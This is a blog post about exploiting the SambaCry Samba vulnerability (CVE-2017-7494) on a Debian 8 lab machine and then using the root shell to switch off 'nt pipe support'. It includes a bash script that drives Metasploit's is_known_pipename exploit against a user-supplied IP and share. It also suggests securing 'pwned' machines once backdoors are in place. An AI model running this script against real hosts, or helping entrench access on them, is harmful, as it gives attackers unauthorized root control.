Patching SambaCry by exploiting it

There has been more than enough of coverage how to hack into a Linux machine running a vulnerable Samba via CVE-2017-7494 (SambaCry) , but what about reversing the evil way for good ? When we get a remote root shell on the target machine we might as well fix the SambaCry vulnerability right ?

(Also to keep other bots/kiddies off our pwned machine once we have all the backdoors in place….)

So how do we do this, or how do we automate it ? Not as easy as it looks (Should be a piece of cake for seasoned C coders out there to re-write the part where we call for /bin/sh in the shared object .so file in the first place and run some remediation sequence of commands. A quick and simple one would be something similar

# sed -i '/\[global\]/a nt pipe support = off ' /etc/samba/smb.conf
# /etc/init.d/samba restart

I have played around with this idea for a while now and turn to you for suggestion on improving the code

In my test environment I have a Debian8 Linux running the vulnerable version of Samba 4.2.14+dfsg-0+deb8u5 with the following “unsecure” configuration (to allow anonymous upload for example)

[Share]
 comment = Share 
 path = /DATA
 guest ok = yes 
 browseable = yes 
 writable = yes

So I write a little helper for Metasploit to load the exploit/linux/samba/is_known_pipename for Guest write access (you can re-write it and add username/passwords variables to the code .. should be really simple)

#!/bin/bash
clear
echo "***************************************************************"
echo " EXPLOITER SAMBACRY PaTcHeR for GUEST USER "
echo " Lets fix Samba via this exploit and patch it "
echo "***************************************************************"
echo -e "What IP of remote Samba ? \c"
read host
echo -e "What is the share name ? : \c"
read name 
echo '[*] Checking if metasploit is present..'
if [ -x ./msfconsole ]; then
echo '[*] Found msfconsole in current path ........ good'
else
 echo '[-] No msfconsole in path...make sure you have this script in your metasploit-framework path'
exit 0
fi

echo 'use exploit/linux/samba/is_known_pipename' > samba.rc
echo 'set PAYLOAD cmd/unix/interact' >> samba.rc
echo -n 'set RHOST ' >> samba.rc
echo -n $host >> samba.rc 
echo '' >> samba.rc 
echo -n 'set SMB_SHARE_NAME ' >> samba.rc 
echo -n $name >> samba.rc 
echo '' >> samba.rc
echo ' set ExitOnSession false' >> samba.rc 
echo 'run' >> samba.rc

echo 'hostname' >> samba.rc 
echo '' >> samba.rc
echo '' >> samba.rc
echo './msfconsole -r samba.rc' > fix-samba.sh 
chmod +x ./fix-samba.sh 
./fix-samba.sh

Once I run this I get a remote root shell via (cmd/unix/interact) which unfortunately is not scriptable to run custom commands that could remediate the SambaCry bug.

Payload advanced options (cmd/unix/interact):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 AutoRunScript no A script to run automatically on session creation.
 InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)

The cmd/unix/interact root shell is not a full shell that would allow you to run the apt-get upgrade for example since it is missing all the profile settings for a proper shell (A nice description is here https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ )

So we are stuck with a limited root shell where vi won’t really work, but sed will definitely do.  So this is exactly what I ran on the rooted Debian8

sed -i '/\[global\]/a nt pipe support = off ' /etc/samba/smb.conf 
/etc/init.d/samba reload

Once I tried to reload the exploit via Metasploit it failed :)

resource (samba.rc)> run
[*] 192.168.11.7:445 - Using location \\192.168.11.7\Share\ for the path
[*] 192.168.11.7:445 - Retrieving the remote path of the share 'Share'
[-] 192.168.11.7:445 - Exploit failed: TypeError no implicit conversion of Symbol into Integer
[*] Exploit completed, but no session was created.

Finally here is my video of the above efforts ..

 

Advertisements

About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

5 Responses to Patching SambaCry by exploiting it

  1. alberttrotter says:

    please explain the following lines
    echo ‘./msfconsole -r samba.rc’ > fix-samba.sh
    chmod +x ./fix-samba.sh
    ./fix-samba.sh

  2. Pingback: IT Security Weekend Catch Up – July 24, 2017 – BadCyber

  3. Pingback: 【知识】7月24日 - 每日安全知识热点 - 莹莹之色

  4. Pingback: 【知识】7月24日 – 每日安全知识热点 – 安百科技

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.